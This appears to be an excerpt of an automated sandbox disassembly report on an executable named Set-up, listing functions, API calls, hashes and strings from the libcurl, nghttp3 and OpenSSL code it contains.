Instruction ID: 96dd00fec36ffaf29de8c5e037ed120128fb50ff70d37dea2710d533276560bb
Opcode Fuzzy Hash: 68e456c143758da2bce633f099572839b592cc5a9e320ecab09d16215c1468e0
Instruction Fuzzy Hash: 31910471A083418BD728DF28C860B6AB3E1AFDA314F1A8A2DE8D597381D7359D458746

Function 00AB2250 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00AB225F
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00AB22CF

Strings

:%u, xrefs: 00AB2290, 00AB2363
Hostname in DNS cache was stale, zapped, xrefs: 00AB2322
Hostname in DNS cache does not have needed family, zapped, xrefs: 00AB23EF, 00AB23FE

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: :%u$Hostname in DNS cache does not have needed family, zapped$Hostname in DNS cache was stale, zapped
API String ID: 3014104814-1335658360
Opcode ID: 0fa8fac201e23fbecb990e46ea26a430bec9fe02ffcb8e2e8141ac0f7c46b523
Instruction ID: 24eb05e2ff6f1a5d5124ac8abfcb9a147b518bc8a2e8984e1fbe4b37c0422e03
Opcode Fuzzy Hash: 0fa8fac201e23fbecb990e46ea26a430bec9fe02ffcb8e2e8141ac0f7c46b523
Instruction Fuzzy Hash: 654167B1A007445BD724AB24DC81BFBB7E9EF84304F08883DE9898B283E635EC55D761

Function 00B106F0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 117COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx > absidx,nghttp3_qpack.c,000008B6,?,?,00B10307,?), ref: 00B107AE
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable),nghttp3_qpack.c,000008B7,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B107C3

Strings

ctx->next_absidx > absidx, xrefs: 00B107A9
ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable), xrefs: 00B107BE
nghttp3_qpack.c, xrefs: 00B107A4, 00B107B9

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assert
String ID: ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable)$ctx->next_absidx > absidx$nghttp3_qpack.c
API String ID: 1222420520-241347991
Opcode ID: 67d8a95585f25c2295beb5ad7fafa0cfd265af54c176aadc6365a86b4b7fb016
Instruction ID: 4ba3f415376c32f38c767825cf98bfdd39474345e55e771e16b5b22d0cef84b2
Opcode Fuzzy Hash: 67d8a95585f25c2295beb5ad7fafa0cfd265af54c176aadc6365a86b4b7fb016
Instruction Fuzzy Hash: 2931D3757006046FD310AA28DC81E6B73D9BF89714F44956CF98A87282E671F8918B92

Function 00DE4610 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116fileCOMMON

Download Yara Rule

APIs

_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00A75FB6,?), ref: 00DE4645
_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(../list/public_suffix_list.dat,?), ref: 00DE4698
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,010A4258), ref: 00DE4744
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00DE4762

Strings

../list/public_suffix_list.dat, xrefs: 00DE4693, 00DE46B9, 00DE46F5

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _stat64$fclosefopen
String ID: ../list/public_suffix_list.dat
API String ID: 1085753941-141370353
Opcode ID: 26aeed6d4ec64ec737a460ff638186a9ee47f8d1b3c97a390bc6d2f11c1fe5eb
Instruction ID: 21c1646050d97ae4762ae565036d8c688246919ab33bdfe41b352fdcceb95e52
Opcode Fuzzy Hash: 26aeed6d4ec64ec737a460ff638186a9ee47f8d1b3c97a390bc6d2f11c1fe5eb
Instruction Fuzzy Hash: C1419CB2A083819BC700EF59D48175AB7E9EB85744F59482CE9C8D7240E7B0ED48CBF2

Function 00B0E990 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 102COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_ksl_it_get(&it) == stream,nghttp3_qpack.c,000008ED,?,?,?,?,?,?,?,00000000,00000000,00000000,?,00B0EF0E,?), ref: 00B0EA23
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!nghttp3_ksl_it_end(&it),nghttp3_qpack.c,000008EC,?,?,?,?,?,?,?,00000000,00000000,00000000,?,00B0EF0E,?), ref: 00B0EA38

Strings

nghttp3_ksl_it_get(&it) == stream, xrefs: 00B0EA1E
nghttp3_qpack.c, xrefs: 00B0EA19, 00B0EA2E
!nghttp3_ksl_it_end(&it), xrefs: 00B0EA33

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assert
String ID: !nghttp3_ksl_it_end(&it)$nghttp3_ksl_it_get(&it) == stream$nghttp3_qpack.c
API String ID: 1222420520-1964160224
Opcode ID: 18dcf5a6c679519326058f90caf347be4ce73a24ea440acc6651f482110e02f0
Instruction ID: d506d63ea54a17a27884b43b9c2056631cda9b2b3338c70fed21886cef4661f8
Opcode Fuzzy Hash: 18dcf5a6c679519326058f90caf347be4ce73a24ea440acc6651f482110e02f0
Instruction Fuzzy Hash: 6231A471904309AFD710DE54DC85D9BBBBCFF99354F008959F8985B292E730D944CB92

Function 00AD2680 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00AD2771

Strings

Connection time-out, xrefs: 00AD26CD
set timeouts for state %d; Total % lld, retry %d maxtry %d, xrefs: 00AD2761
netascii, xrefs: 00AD2680
gfff, xrefs: 00AD26EE

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _time64
String ID: Connection time-out$gfff$netascii$set timeouts for state %d; Total % lld, retry %d maxtry %d
API String ID: 1670930206-2395985473
Opcode ID: 5496e8987847803c4d0acd8fcc4010cbbb1e0de8cca0a51d2ffac21ba23a361d
Instruction ID: cd25a1c69243bf28105b52d56f02a0e4117b1c1e84468f9b51459be880fa1cac
Opcode Fuzzy Hash: 5496e8987847803c4d0acd8fcc4010cbbb1e0de8cca0a51d2ffac21ba23a361d
Instruction Fuzzy Hash: 6521F8B1B003005FE724AA29EC05B2779DAEBD4304F18893EF90ACB396E671D800D761

Function 00B06010 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(veccnt > 0,nghttp3_stream.c,0000033D), ref: 00B06119
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == offset,nghttp3_stream.c,00000349), ref: 00B0612E

Strings

0 == offset, xrefs: 00B06129
veccnt > 0, xrefs: 00B06114
nghttp3_stream.c, xrefs: 00B0610F, 00B06124

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assert
String ID: 0 == offset$nghttp3_stream.c$veccnt > 0
API String ID: 1222420520-3888743547
Opcode ID: 56107da40d485bf857ba05b81c59dc8f2a114e5e0f73b3976897c108918fcb46
Instruction ID: bff134e039534252c4877e981b5115d73566f92753e873f26ce22de7058b0c9c
Opcode Fuzzy Hash: 56107da40d485bf857ba05b81c59dc8f2a114e5e0f73b3976897c108918fcb46
Instruction Fuzzy Hash: 133127316443048FC704EF18D8C5A6ABBE4FF88318F0585BCE9895B391E632EE51CB92

Function 00B087E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 61COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(n <= balloc->blklen,nghttp3_balloc.c,00000042,?,00000000,?,00B04D5A,00000000,?,000001F0), ref: 00B08861
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(((uintptr_t)balloc->buf.last & 0xfu) == 0,nghttp3_balloc.c,00000055,?,000001F0), ref: 00B08873

Strings

n <= balloc->blklen, xrefs: 00B0885C
((uintptr_t)balloc->buf.last & 0xfu) == 0, xrefs: 00B0886E
nghttp3_balloc.c, xrefs: 00B08857, 00B08869

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assert
String ID: ((uintptr_t)balloc->buf.last & 0xfu) == 0$n <= balloc->blklen$nghttp3_balloc.c
API String ID: 1222420520-3025919285
Opcode ID: 6c0febb89fcb10761297421541485d2caf13026be7bcb753d057d397e65852ff
Instruction ID: 3b38ef26dafdce3f6b78d0abcfcaf86d8e132e2630984c0e414a9abf69d29fe5
Opcode Fuzzy Hash: 6c0febb89fcb10761297421541485d2caf13026be7bcb753d057d397e65852ff
Instruction Fuzzy Hash: 811108B2A00701BBD7109F29EC41955B7A8FF45731B048624F954976C1D731E960DBE6

Function 00A64810 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 484COMMON

Download Yara Rule

Strings

formdata.c, xrefs: 00A6481F, 00A64C8D, 00A64DEB, 00A64F36, 00A64FF3, 00A65081, 00A650AB, 00A650E6, 00A65116, 00A65161, 00A6518B, 00A651C6, 00A651F6
application/octet-stream, xrefs: 00A64DE3

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID: application/octet-stream$formdata.c
API String ID: 0-1216067158
Opcode ID: 5582a8b1bc73c8858e251a8cffb1cc5f686c04779f108977ff5b0e3a80655e74
Instruction ID: 338b6d0527f513c88482ad83fcd23ed19392993fc5ce4e4b92bc249f688daf3d
Opcode Fuzzy Hash: 5582a8b1bc73c8858e251a8cffb1cc5f686c04779f108977ff5b0e3a80655e74
Instruction Fuzzy Hash: AB02C7B0E08B408FE7259F24D980727BBF1BF59708F19492DD88A4B792D776E885C742

Function 00D046B0 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 324stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00D046DD

Strings

minsize=%ld, xrefs: 00D0485A
maxsize=%ld, xrefs: 00D04899
ASN1_mbstring_ncopy, xrefs: 00D04797, 00D047BC, 00D047E1, 00D04806, 00D04845, 00D04884, 00D0492C, 00D049DE, 00D04A35
crypto/asn1/a_mbstr.c, xrefs: 00D0479E, 00D047C3, 00D047E8, 00D0480D, 00D0484C, 00D0488B, 00D04933, 00D04A3F, 00D04A9D

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strlen
String ID: ASN1_mbstring_ncopy$crypto/asn1/a_mbstr.c$maxsize=%ld$minsize=%ld
API String ID: 39653677-2338284442
Opcode ID: 3199b200ac8922bd591daff1e245459003d34779d34fb384426b4e501abd321f
Instruction ID: e2e1d1a70f679e89c127ff0c2c14c9be66c91ab9c40cf49ef01df32b11dc42f0
Opcode Fuzzy Hash: 3199b200ac8922bd591daff1e245459003d34779d34fb384426b4e501abd321f
Instruction Fuzzy Hash: 57A117B5B48301ABD710AA14AC02F5B73E4AB95704F14452CFF8D9B3C2E6B5DC4496B7

Function 00C52530 Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 306COMMON

Download Yara Rule

Strings

.%lu, xrefs: 00C52761
crypto/objects/obj_dat.c, xrefs: 00C52810

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID: .%lu$crypto/objects/obj_dat.c
API String ID: 0-3322715555
Opcode ID: b3db5ee74e983a48567199f75714c23a6c7ae361fc8f1894f61258fe5e25b279
Instruction ID: 3483fb5f41fcef02a54e391fda1fde4258c837bc87a352fa3bd2ecc8e603d2a5
Opcode Fuzzy Hash: b3db5ee74e983a48567199f75714c23a6c7ae361fc8f1894f61258fe5e25b279
Instruction Fuzzy Hash: 48A106BAA083019BD7109E25C84072BB7E5AFD6746F18882CFC9887241FB70DD8DD796

Function 00A90080 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 301stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A90090

Part of subcall function 00B4F340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,00A900B0,?,?,00000000,00000000,?), ref: 00B4F35D

Strings

Bad file size (%lld), xrefs: 00A94CFF
File already completely downloaded, xrefs: 00A94239
$, xrefs: 00A94D75
Offset (%lld) was beyond file size (%lld), xrefs: 00A94CF5, 00A94D0E, 00A94D64

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: $$Bad file size (%lld)$File already completely downloaded$Offset (%lld) was beyond file size (%lld)
API String ID: 3014104814-979756411
Opcode ID: b5bf1bf30859b82009897dec1ca7fa30fa6e31c93eca6d52c6d13a1f13783c4b
Instruction ID: 6ba068381d14923bdf8a6ba6508c52414a5a8a74bce33240f1a144fbc5765fc5
Opcode Fuzzy Hash: b5bf1bf30859b82009897dec1ca7fa30fa6e31c93eca6d52c6d13a1f13783c4b
Instruction Fuzzy Hash: 8FB1E4B1B083409FDB14DF28C880F6AB7E5AFC9714F14466CF998973A2D771AD058B92

Function 00A7E300 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 283COMMON

Download Yara Rule

Strings

cannot mix POSTFIELDS with RESUME_FROM, xrefs: 00A7E3C1
No URL set, xrefs: 00A7E393
User-Agent: %s, xrefs: 00A7E60C
transfer.c, xrefs: 00A7E331, 00A7E364, 00A7E479, 00A7E59A, 00A7E5E4, 00A7E70D, 00A7E729

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
